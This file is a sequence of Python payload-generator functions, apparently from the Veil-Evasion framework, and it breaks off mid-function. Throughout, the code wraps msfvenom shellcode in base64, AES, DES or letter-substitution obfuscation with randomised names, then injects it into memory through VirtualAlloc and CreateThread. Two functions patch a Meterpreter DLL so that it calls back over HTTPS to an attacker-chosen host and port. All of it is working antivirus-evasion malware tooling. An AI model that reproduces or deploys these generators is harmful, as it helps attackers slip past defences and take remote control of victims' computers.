def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandT = randomizer.randomString() PayloadCode = 'import ctypes\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode else: # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() DecodedShellcode = randomizer.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom self.shellcode = shellcode.Shellcode() Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() # Create Payload code PayloadCode = "import ctypes\n" PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n" PayloadCode += ( RandPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + ShellcodeVariableName + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (ctypes.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" ) PayloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + RandPtr + ")," + RandBuf + ",ctypes.c_int(len(" + ShellcodeVariableName + ")))\n" ) PayloadCode += ( RandHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + RandPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n" if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom self.shellcode = shellcode.Shellcode() Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodeAES = randomizer.randomString() RandCipherObject = randomizer.randomString() RandDecodedShellcode = randomizer.randomString() RandShellCode = randomizer.randomString() RandPadding = randomizer.randomString() # Generate Random AES Key secret = randomizer.randomKey() # Create Cipher Object with Generated Secret Key cipher = AES.new(secret) EncodedShellcode = encryption.EncodeAES(cipher, Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names SubbedShellcodeVariableName = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodedLetter = randomizer.randomString() RandCorrectLetter = randomizer.randomString() RandSubScheme = randomizer.randomString() # Letter Substitution Variables EncodeWithThis = "c" DecodeWithThis = "t" # Create Letter Substitution Scheme SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") # Create Payload File PayloadCode = 'import ctypes\n' PayloadCode += 'from string import maketrans\n' PayloadCode += RandDecodedLetter + ' = "t"\n' PayloadCode += RandCorrectLetter + ' = "c"\n' PayloadCode += RandSubScheme + ' = maketrans(' + RandDecodedLetter + ', ' + RandCorrectLetter + ')\n' PayloadCode += SubbedShellcodeVariableName + ' = \"' + Shellcode.translate( SubScheme) + '\"\n' PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom self.shellcode = shellcode.Shellcode() Shellcode = self.shellcode.generate() # Generate Random Variable Names SubbedShellcodeVariableName = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodedLetter = randomizer.randomString() RandCorrectLetter = randomizer.randomString() RandSubScheme = randomizer.randomString() # Letter Substitution Variables EncodeWithThis = "c" DecodeWithThis = "t" # Create Letter Substitution Scheme SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") # Create Payload File PayloadCode = 'import ctypes\n' PayloadCode += 'from string import maketrans\n' PayloadCode += RandDecodedLetter + ' = "t"\n' PayloadCode += RandCorrectLetter + ' = "c"\n' PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n' PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n' PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodeAES = randomizer.randomString() RandCipherObject = randomizer.randomString() RandDecodedShellcode = randomizer.randomString() RandShellCode = randomizer.randomString() RandPadding = randomizer.randomString() # Generate Random AES Key secret = randomizer.randomKey() # Create Cipher Object with Generated Secret Key cipher = AES.new(secret) EncodedShellcode = encryption.EncodeAES(cipher, Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom self.shellcode = shellcode.Shellcode() Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandDESKey = randomizer.randomString() RandDESPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and DES Key iv = randomizer.randomKey(8) DESKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload desmain = DES.new(DESKey, DES.MODE_CFB, iv) EncShellCode = desmain.encrypt(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandDESKey = randomizer.randomString() RandDESPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and DES Key iv = randomizer.randomKey(8) DESKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload desmain = DES.new(DESKey, DES.MODE_CFB, iv) EncShellCode = desmain.encrypt(Shellcode) # Create Payload File PayloadCode = 'from Crypto.Cipher import DES\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n' PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() PayloadCode = 'from ctypes import *\n' PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37" headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn on SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTPS\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "https://" + self.required_options['LHOST'][0] + ":" + str( self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum( ) + "_" + randomizer.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index( struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" randVarName = randomizer.randomString() randFuncName = randomizer.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName + "()\n" if self.required_options["use_encrypter"][0].lower() == "y": payloadCode = crypters.pyherion(payloadCode) return payloadCode
def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll" else: metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0" headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTPS\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = randomizer.randomString() randFuncName = randomizer.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() randPtr = randomizer.randomString() randBuf = randomizer.randomString() randHt = randomizer.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = crypters.pyherion(payloadCode) return payloadCode
def generate(self): #Random letter substition variables hex_letters = "abcdef" non_hex_letters = "ghijklmnopqrstuvwyz" encode_with_this = random.choice(hex_letters) decode_with_this = random.choice(non_hex_letters) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names subbed_shellcode_variable_name = randomizer.randomString() shellcode_variable_name = randomizer.randomString() rand_ptr = randomizer.randomString() rand_buf = randomizer.randomString() rand_ht = randomizer.randomString() rand_decoded_letter = randomizer.randomString() rand_correct_letter = randomizer.randomString() rand_sub_scheme = randomizer.randomString() # Create Letter Substitution Scheme sub_scheme = string.maketrans(encode_with_this, decode_with_this) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") if self.required_options["inject_method"][0].lower() == "virtual": # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = 